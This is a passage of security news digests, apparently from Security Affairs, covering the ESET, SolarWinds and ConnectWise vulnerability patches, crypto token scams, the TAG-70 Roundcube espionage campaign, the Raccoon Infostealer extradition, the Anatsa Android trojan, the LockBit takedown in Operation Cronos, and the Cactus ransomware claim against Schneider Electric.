Since May 2019, Penchukov had a prominent role in the Zeus operation. From at least November 2018 through February 2021, Penchukov helped lead a conspiracy that infected victim computers with IcedID or Bokbot.
Penchukov faces up to 20 years in prison for each count, he is scheduled to be sentenced on May 9.
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.
Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.
Cybersecurity firm ESET has addressed a high-severity elevation of privilege vulnerability in its Windows security solution.
ESET addressed a high-severity vulnerability, tracked as CVE-2024-0353 (CVSS score 7.8), in its Windows products.
The vulnerability is a local privilege escalation issue that was submitted to the company by the Zero Day Initiative (ZDI). According to the advisory, an attacker can misuse ESET’s file operations, as performed by the Real-time file system protection, to delete files without having the proper permission.
“The vulnerability in file operations handling, performed by the Real-time file system protection feature on the Windows operating system, potentially allowed an attacker with an ability to execute low-privileged code on the target system to delete arbitrary files as NT AUTHORITY\SYSTEM, escalating their privileges.” reads the advisory.
ESET is not aware of attacks in the wild exploiting this vulnerability.
Below is the list of impacted programs and versions:
ESET NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate 16.2.15.0 and earlier
ESET Endpoint Antivirus for Windows and Endpoint Security for Windows 10.1.2058.0, 10.0.2049.0, 9.1.2066.0, 8.1.2052.0 and earlier from the respective version family
ESET Server Security for Windows Server (formerly File Security for Microsoft Windows Server) 10.0.12014.0, 9.0.12018.0, 8.0.12015.0, 7.3.12011.0 and earlier from the respective version family
ESET Mail Security for Microsoft Exchange Server 10.1.10010.0, 10.0.10017.0, 9.0.10011.0, 8.0.10022.0, 7.3.10014.0 and earlier from the respective version family
ESET Mail Security for IBM Domino 10.0.14006.0, 9.0.14007.0, 8.0.14010.0, 7.3.14004.0 and earlier from the respective version family
ESET Security for Microsoft SharePoint Server 10.0.15004.0, 9.0.15005.0, 8.0.15011.0, 7.3.15004.0 and earlier from the respective version family
ESET File Security for Microsoft Azure (all versions)
The cybersecurity firm has released patches to address the issues in NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate, Endpoint Antivirus and Endpoint Security for Windows, Server Security for Windows Server, Mail Security for Exchange Server and IBM Domino, Security for SharePoint Server, File Security for Microsoft Azure.
The security firm hasn’t provided security patches for products that reached their end-of-life (EoL) status.
The company recommended customers patch their products as soon as possible.
Vulnerabilities in security solutions are very dangerous because these issues are difficult to detect and because these software solutions run with high privileges.
In December 2023, the cybersecurity firm addressed a vulnerability (CVE-2023-5594, CVSS score 7.5) in the Secure Traffic Scanning Feature, preventing potential exploitation that could lead web browsers to trust websites using certificates signed with outdated and insecure algorithms.
SolarWinds addressed three critical vulnerabilities in its Access Rights Manager (ARM) solution, including two RCE bugs.
SolarWinds has fixed several Remote Code Execution (RCE) vulnerabilities in its Access Rights Manager (ARM) solution.
Access Rights Manager (ARM) is a software solution designed to assist organizations in managing and monitoring access rights and permissions within their IT infrastructure. This type of tool is crucial for maintaining security, compliance, and efficient administration of user access to various resources, systems, and data.
Below is the list of flaws addressed by the company:
The three critical remote code execution flaws are:
CVE-2023-40057 (CVSS score 9.0): A deserialization of untrusted data issue. An authenticated user can exploit this vulnerability to abuse a SolarWinds service resulting in remote code execution.
CVE-2024-23479 (CVSS score 9.6): A Directory Traversal Remote Code Execution Vulnerability. An unauthenticated user can exploit this issue to achieve the Remote Code Execution.
CVE-2024-23476 (CVSS score 9.6) Directory Traversal Remote Code Execution Vulnerability. If exploited, this vulnerability allows an unauthenticated user to achieve the Remote Code Execution.
SolarWinds made the headlines in 2020, when Russia-linked APT group carried out a supply chain attack that compromised the Orion software provided by the company.
Resecurity has identified an increasing trend of cryptocurrency counterfeiting, the experts found several tokens impersonating major brands, government organizations and national fiat currencies.
Resecurity has identified an increasing trend of cryptocurrency counterfeiting. Ongoing brand protection for Fortune 100 companies by cybersecurity company uncovered several tokens impersonating major brands, government organizations and even national fiat currencies.
As in any other booming industry, the decentralized finance (DeFi) and crypto space has attracted its fair share of scammers and bad actors. These individuals seek to lure investors into fake projects known as rug pulls, only to abscond with their funds.
A notable example of this deceptive practice is the emergence of a counterfeit token named ‘BRICS’ recently detected by Resecurity, which exploited the focus on the investment interest and potential expansion of the BRICS intergovernmental organization, comprising countries like Brazil, Russia, India, China, South Africa, Egypt, Ethiopia, Iran, and the United Arab Emirates.
Besides scamming, bad actors also released misinformation about new countries joining the alliance, which didn’t confirm their membership. This is a great example of how bad actors capitalize on geopolitical narratives to profit from investment scams. Likely, unverified news stating BRICS countries adopting a gold-backed money to compete with the US dollar and Euro inspired bad actors with this idea which later transitioned into creative crypto-scam.
Leveraging a global international umbrella of the organization, fraudsters launched an initial coin offering (ICO) promoting the fake token offering various rewards.
This type of fraud was prominently observed on platforms such as Lobstr.co, which allows the creation of tokens on the Stellar network. Due to their flexibility in allowing users to offer their own tokens for trading, such platforms are especially susceptible to exploitation by cybercriminals.
The common fraudulent tactics they employ include ‘cryptocurrency counterfeiting’, where scammers create tokens with names like those of legitimate ones, and the aforementioned ‘rug pulls’.
As for today, the token was still available for trading attracting victims:
The offer already generated some interest and led to first victims:
Resecurity warns Internet users to perform due diligence of new cryptocurrency offerings and contact your local regulators to make sure they are legitimate.
Resecurity has identified and reported similar cryptocurrency counterfeit tokens promoted at the same platform impersonating:
one of the major oil corporations
national financial regulator
national currency
major real estate development
Some of these scams involved misleading information referencing Monetary Authority of Singapore and Central Bank of one of the countries in the Middle East.
According to Solidus Labs, ‘rug pull’ scams have defrauded over 2 million investors, surpassing the number of victims from major crypto failures like FTX, Celsius, and Voyager.
These scams typically manifest in two forms:
DeFi scams involve altering a token’s smart contract to defraud investors. Tactics used include making the token unsellable, enabling the creation of an unlimited number of new tokens, or imposing high trading fees
Exit scams are characterized by extensive promotion of a token, followed by the scammers betraying investors. Methods include creating fake marketing websites, announcing non-existent partnerships, or using bots for wash trading.
The low barrier to entry for executing these scams makes them accessible to a broad range of malicious actors, eliminating the need for advanced programming skills. Utilizing platforms like Stellar to create misleadingly named tokens is a common strategy in these ‘rug pulls’.
The cryptocurrency landscape faces significant challenges in combating such fraudulent activities, highlighting the urgent need for increased vigilance and more robust regulatory frameworks.
More details are included in the analysis published by Resecurity:
An APT group, tracked as TAG-70, linked to Belarus and Russia exploited XSS flaws in Roundcube webmail servers to target over 80 organizations.
Researchers from Recorded Future’s Insikt Group identified a cyberespionage campaign carried out by an APT group, tracked as TAG-70, linked to Belarus and Russia. The nation-state actors are known to carry out cyber-espionage against targeting government, military, and national infrastructure entities in Europe and Central Asia since at least December 2020.
Between October and December 2023, TAG-70 exploited cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers in attacks aimed at over 80 organizations, primarily in Georgia, Poland, and Ukraine.
“TAG70 has demonstrated a high level of sophistication in its attack methods. The threat actors leveraged social engineering techniques and exploited cross-site scripting vulnerabilities in Roundcube webmail servers to gain unauthorized access to targeted mail servers, successfully bypassing the defenses of government and military organizations.” reads the report published Recorded Future’s Insikt Group.
The researchers noticed similarities between this campaign and other activities conducted by other Russia-linked groups, such as BlueDelta (APT28) and Sandworm. These APT groups previously targeted email solutions, including Roundcube and Zimbra.
The compromise of email servers poses a substantial risk, especially during a conflict such as Russia-Ukraine. Threat actors can target email servers to gather intelligence about adversaries’ war efforts, diplomatic relationships, and coalition partnerships.
The attacks aimed at Iranian embassies in Russia and the Netherlands demonstrate a broader geopolitical interest in assessing Iran’s diplomatic activities, particularly its support for Russia in the context of the Ukrainian conflict. Similarly, the espionage against Georgian government entities reflects an interest in monitoring Georgia’s pursuits to access the European Union (EU) and NATO.
On July 27, 2023, the researchers a malicious JavaScript that was acting as a second-stage loader used by TAG70 previous to the exploitation of Roundcube issue. ESET researchers also detailed the same attack chain.
The JavaScript is loaded through cross-site scripting (XSS) from a malicious email and it decoded a Base64-encoded JavaScript payload (jsBodyBase64). Then the payload is inserted into the Document Object Model (DOM) of the Roundcube webpage within a newly created script tag.
The researchers recommend reading the detailed analysis of the recent TAG-70 campaign here.
The Raccoon Infostealer operator, Mark Sokolovsky, was extradited to the US from the Netherlands to appear in a US court.
In October 2020, the US Justice Department charged a Ukrainian national, Mark Sokolovsky (28), with computer fraud for allegedly infecting millions of computers with the Raccoon Infostealer.
The man was held in the Netherlands, and he was charged for his alleged role in the international cybercrime operation known as Raccoon Infostealer. He appealed the decision of a Dutch Court for granting his extradition to the United States, but it was finally extradited to the US from the Netherlands to appear in a US court.
The Raccoon stealer was first spotted in April 2019, it was designed to steal victims’ credit card data, email credentials, cryptocurrency wallets, and other sensitive data.
Raccoon is offered for sale as a malware-as-a-service (MaaS) that implements an easy-to-use automated backend panel, operators also offer bulletproof hosting and 24/7 customer support in both Russian and English. The price of the Raccoon service is $200 per month to use.
The Raccoon stealer is written in C++ by Russian-speaking developers who initially promoted it exclusively on Russian-speaking hacking forums. The malware is now promoted on English-speaking hacking forums, it works on both 32-bit and 64-bit operating systems.
The analysis of the logs for sale in the underground community allowed the experts to estimate that Raccoon infected over 100,000 users worldwide at the time of its discovery.
The list of targeted applications includes cryptocurrency apps for major currencies (Electrum, Ethereum, Exodus, Jaxx, and Monero), popular browsers (Google Chrome, Mozilla Firefox, Microsoft Edge, Internet Explorer, Opera, Vivaldi, Waterfox, SeaMonkey, UC Browser) and email client like Thunderbird, Outlook, and Foxmail.
Dutch authorities arrested Sokolovsky in March 2022, concurrent with his arrest, the FBI and law enforcement partners in Italy and the Netherlands dismantled the C2 infrastructure used by the Raccoon Infostealer operation.
FBI identified more than 50 million unique credentials and forms of identification (email addresses, bank accounts, cryptocurrency addresses, credit card numbers, etc.) in the stolen data. While the exact number of victims has yet to be verified, experts believe that millions of potential victims around the world were targeted by the operation.
The credentials appear to include over four million email addresses. The United States does not believe it is in possession of all the data stolen by Raccoon Infostealer and continues to investigate.
Sokolovsky is charged with computer fraud, wire fraud, money laundering and aggravated identity theft.
Sokolovsky faces a maximum penalty of 20 years in prison for the wire fraud and money laundering offenses, five years for the conspiracy to commit computer fraud charge, and a mandatory consecutive two-year term for the aggravated identity theft offense.
He appeared in a US court on February 9 and is currently awaiting trial.
The Android banking trojan Anatsa resurged expanding its operation to new countries, including Slovakia, Slovenia, and Czechia.
In November 2023, researchers from ThreatFabric observed a resurgence of the Anatsa banking Trojan, aka TeaBot and Toddler. Between November and February, the experts observed five distinct waves of attacks, each focusing on different regions.
The malware previously focused its activities on the UK, Germany, and Spain, but the latest campaigns targeted Slovakia, Slovenia, and Czechia, which suggests a shift in its operational strategy.
The researchers classified Anatsa’s activity as “targeted,” threat actors were observed focusing on 3-5 regions at a time. According to ThreatFabric, the dropper applications were uploaded on Google Play in the targeted regions. The attackers noticed that the applications often reached the Top-3 in the “Top New Free” category, in an attempt to trick users into believing that the application was legitimate and downloaded by a large number of users.
“Throughout this campaign, Anatsa’s Modus Operandi has evolved, displaying more sophisticated tactics such as AccessibilityService abuse, a multi-staged infection process, and the ability to bypass Android 13’s restricted settings.” reads the report published by ThreatFabric.
The researchers pointed out that some of the droppers successfully exploited the accessibility service and bypassed Google Play’s enhanced detection and protection mechanisms.
The avoid detection, the droppers adopted a multi-staged methodology, dynamically retrieving configuration and malicious executable files from their C2 server.
“All droppers in this campaign have demonstrated the capability to bypass the restricted settings for accessibility service in Android 13.” continues the report.
The experts observed five droppers in the latest campaign with over 100,000 total installations.
Anatsa was first detected by the Italian cybersecurity firm Cleafy in March 2021 while it was targeting banks in Spain, Germany, Italy, Belgium, and the Netherlands.
TeaBot supports common features of Android banking Trojan and like other similar malware families it abuses Accessibility Services. Below is a list of features implemented by the malware:
Ability to perform Overlay Attacks against multiple bank applications to steal login credentials and credit card information
Ability to send / intercept / hide SMS messages
Enabling keylogging functionalities
Ability to steal Google Authentication codes
Ability to obtain full remote control of an Android device (via Accessibility Services and realtime screen-sharing)
The Anatsa banking Trojan allows operators to take over the infected devices and execute actions on a victim’s behalf.
“Effective detection and monitoring of malicious applications, along with observing unusual customer account behaviour, are crucial for identifying and investigating potential fraud cases linked to device-takeover mobile malware like Anatsa.” concludes the report.
Below a statement sent by Google spokesperson to Security Affairs:
“All of the apps identified in the report have been removed from Google Play. Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.”
An international law enforcement operation codenamed ‘Operation Cronos’ led to the disruption of the LockBit ransomware operation.
A joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries has disrupted the LockBit ransomware operation.
Below is the image of the Tor leak site of the Lockbit ransomware gang that was seized by the UK National Crime Agency (NCA).
“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, working in close cooperation with the FBI and the international law enforcement task force, ‘Operation Cronos’,” reads the banner.
“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation. Return here for more information at: 11:30 GMT on Tuesday 20th Feb”
The Operation Cronos operation is still ongoing and NCA’s announced that more information will be published tomorrow, February 20, 2024.
“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, Working in close cooperation with the FBI and the international law enforcement task force, Operation Cronos,” the banner reads.
“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation.”
vx-underground researchers contacted the administrators of the gang who confirmed that their infrastructure was seized by the FBI.
Lockbit ransomware group administrative staff has confirmed with us their websites have been seized. pic.twitter.com/SvpbeslrCd
LockBit is a prominent ransomware operation that first emerged in September 2019. In 2022, LockBit was one of the most active ransomware groups, and its prevalence continued into 2023. Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The LockBit ransomware operation operated under a Ransomware-as-a-Service (RaaS) model, recruiting affiliates to carry out ransomware attacks through the utilization of LockBit ransomware tools and infrastructure.
According to a joint report published by US authorities and international peers, the total of U.S. ransoms paid to LockBit is approximately $91M since LockBit activity was first observed in the U.S. on January 5, 2020.
The Cactus ransomware gang claims the theft of 1.5TB of data from the Energy management and industrial automation firm Schneider Electric.
The Cactus ransomware group claims responsibility for pilfering 1.5TB of data from the Energy management and industrial automation giant Schneider Electric.
Schneider Electric is a multinational company that specializes in energy management, industrial automation, and digital transformation.
In January, BleepingComputer first reported the attack that hit the Sustainability Business division of the company on January 17th. At the time, BleepingComputer contacted Schneider Electric which confirmed the data breach.
The attack impacted the services of Schneider Electric’s Resource Advisor cloud platform causing outages.
Schneider Electric said that other divisions of the company were not impacted by the cyber attack.
Today The Cactus ransomware gang published 25MB of allegedly stolen data on its Tor leak site.
The gang also published several pictures of passports and company documents as proof of the hack.
The Cactus ransomware operation has been active since March 2023, Kroll researchers reported that the ransomware strain is notable for the use of encryption to protect the ransomware binary.
Cactus ransomware uses the SoftPerfect Network Scanner (netscan) to look for other targets on the network along with PowerShell commands to enumerate endpoints. The ransomware identifies user accounts by viewing successful logins in Windows Event Viewer, it also uses a modified variant of the open-source PSnmap Tool.
The Cactus ransomware relies on multiple legitimate tools (e.g. Splashtop, AnyDesk, SuperOps RMM) to achieve remote access and uses Cobalt Strike and the proxy tool Chisel in post-exploitation activities.
Once the malware has escalated the privileges on a machine, the threat actors use a batch script to uninstall popular antivirus solutions installed on the machine.
Cactus uses the Rclone tool for data exfiltration and used a PowerShell script called TotalExec, which was used in the past by BlackBasta ransomware operators, to automate the deployment of the encryption process.
In early January, the Cactus ransomware group claimed to have hacked Coop, one of the largest retail and grocery providers in Sweden.
Law enforcement provided additional details about the international Operation Cronos that led to the disruption of the Lockbit ransomware operation.
Yesterday, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation.
Below is the image of the Tor leak site of the Lockbit ransomware gang that was seized by the UK National Crime Agency (NCA).
“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, working in close cooperation with the FBI and the international law enforcement task force, ‘Operation Cronos’,” reads the banner.
“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation. Return here for more information at: 11:30 GMT on Tuesday 20th Feb”
The Operation Cronos operation is still ongoing and NCA announced that more information have yet to be shared.
“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, Working in close cooperation with the FBI and the international law enforcement task force, Operation Cronos,” the banner reads.
“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation.”
vx-underground researchers contacted the administrators of the gang who confirmed that their infrastructure was seized by the FBI.
Lockbit ransomware group administrative staff has confirmed with us their websites have been seized. pic.twitter.com/SvpbeslrCd
The operation led to the arrest of two members of the ransomware gang in Poland and Ukraine and the seizure of hundreds of crypto wallets used by the group.
The British NCA took control of LockBit’s central administration environment used by the RaaS affiliates to carry out the cyberattacks. The authorities also seized the dark web Tor leak site used by the group.
The Tor leak site was seized by the NCA and is now used to publish updates on the law enforcement operation and provide support to the victims of the gang.
The NCA also obtained the source code of the LockBit platform and a huge trove of information on the group’s operation, including information on affiliates and supporters.
Law enforcement also had access to data stolen from the victims of the ransomware operation, a circumstance that highlights the fact that even when a ransom is paid, the ransomware gang often fails to delete the stolen information.
“LockBit had a bespoke data exfiltration tool, known as Stealbit, which was used by affiliates to steal victim data. Over the last 12 hours this infrastructure, based in three countries, has been seized by members of the Op Cronos taskforce, and 28 servers belonging to LockBit affiliates have also been taken down.” reads the NCA’s announcement. “The technical infiltration and disruption is only the beginning of a series of actions against LockBit and their affiliates. In wider action coordinated by Europol, two LockBit actors have been arrested this morning in Poland and Ukraine, over 200 cryptocurrency accounts linked to the group have been frozen.”
The US Department of Justice has charged two individuals for orchestrating ransomware attacks using the LockBit ransomware, they are currently in custody and will undergo trial in the US.
“The Justice Department also unsealed an indictment obtained in the District of New Jersey charging Russian nationals Artur Sungatov and Ivan Kondratyev, also known as Bassterlord, with deploying LockBit against numerous victims throughout the United States, including businesses nationwide in the manufacturing and other industries, as well as victims around the world in the semiconductor and other industries. Today, additional criminal charges against Kondratyev were unsealed in the Northern District of California related to his deployment in 2020 of ransomware against a victim located in California.” reads the press release published by DoJ.
“Finally, the Department also unsealed two search warrants issued in the District of New Jersey that authorized the FBI to disrupt multiple U.S.-based servers used by LockBit members in connection with the LockBit disruption.”
Additionally, the US authorities has unveiled indictments against two Russian nationals, accusing them of conspiring to carry out LockBit attacks.
The NCA and its global partners have secured over 1,000 decryption keys that will allow victims of the gang to recover their files for free. The NCA will reach out to victims based in the UK in the coming days and weeks, providing support to help them recover encrypted data.
“This NCA-led investigation is a ground-breaking disruption of the world’s most harmful cyber crime group. It shows that no criminal operation, wherever they are, and no matter how advanced, is beyond the reach of the Agency and our partners.” said National Crime Agency Director General, Graeme Biggar.
“Through our close collaboration, we have hacked the hackers; taken control of their infrastructure, seized their source code, and obtained keys that will help victims decrypt their systems.”
“As of today, LockBit are locked out. We have damaged the capability and most notably, the credibility of a group that depended on secrecy and anonymity.
“Our work does not stop here. LockBit may seek to rebuild their criminal enterprise. However, we know who they are, and how they operate. We are tenacious and we will not stop in our efforts to target this group and anyone associated with them.”
The free decryptor for the Lockbit ransomware can be downloaded from the website of the ‘No More Ransom’ initiative. It’s unclear which version of the ransomware is targeted by the decryptor.
LockBit is a prominent ransomware operation that first emerged in September 2019. In 2022, LockBit was one of the most active ransomware groups, and its prevalence continued into 2023. Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The LockBit ransomware operation operated under a Ransomware-as-a-Service (RaaS) model, recruiting affiliates to carry out ransomware attacks through the utilization of LockBit ransomware tools and infrastructure.
According to a joint report published by US authorities and international peers, the total of U.S. ransoms paid to LockBit is approximately $91M since LockBit activity was first observed in the U.S. on January 5, 2020.
ConnectWise addressed two critical vulnerabilities in its ScreenConnect remote desktop access product and urges customers to install the patches asap.
ConnectWise warns of the following two critical vulnerabilities in its ScreenConnect remote desktop access product:
CWE-288 Authentication bypass using an alternate path or channel (CVSS score 10)
CWE-22 Improper limitation of a pathname to a restricted directory (“path traversal”) (CVSS score 8.4)
Both vulnerabilities were reported on February 13, 2024, through the company vulnerability disclosure channel via the ConnectWise Trust Center. The company is not aware of attacks in the wild exploiting these vulnerabilities, however, due to the higher risk of being targeted by exploits, ConnectWise recommends installing updates as emergency changes within days.
The issues impact ScreenConnect 23.9.7 and prior, below is the remediation provided in the advisory:
Cloud
There are no actions needed by the partner, ScreenConnect servers hosted in “screenconnect.com” cloud or “hostedrmm.com” have been updated to remediate the issue.
On-premise
Partners that are self-hosted or on-premise need to update their servers to version 23.9.8 immediately to apply a patch.
Login
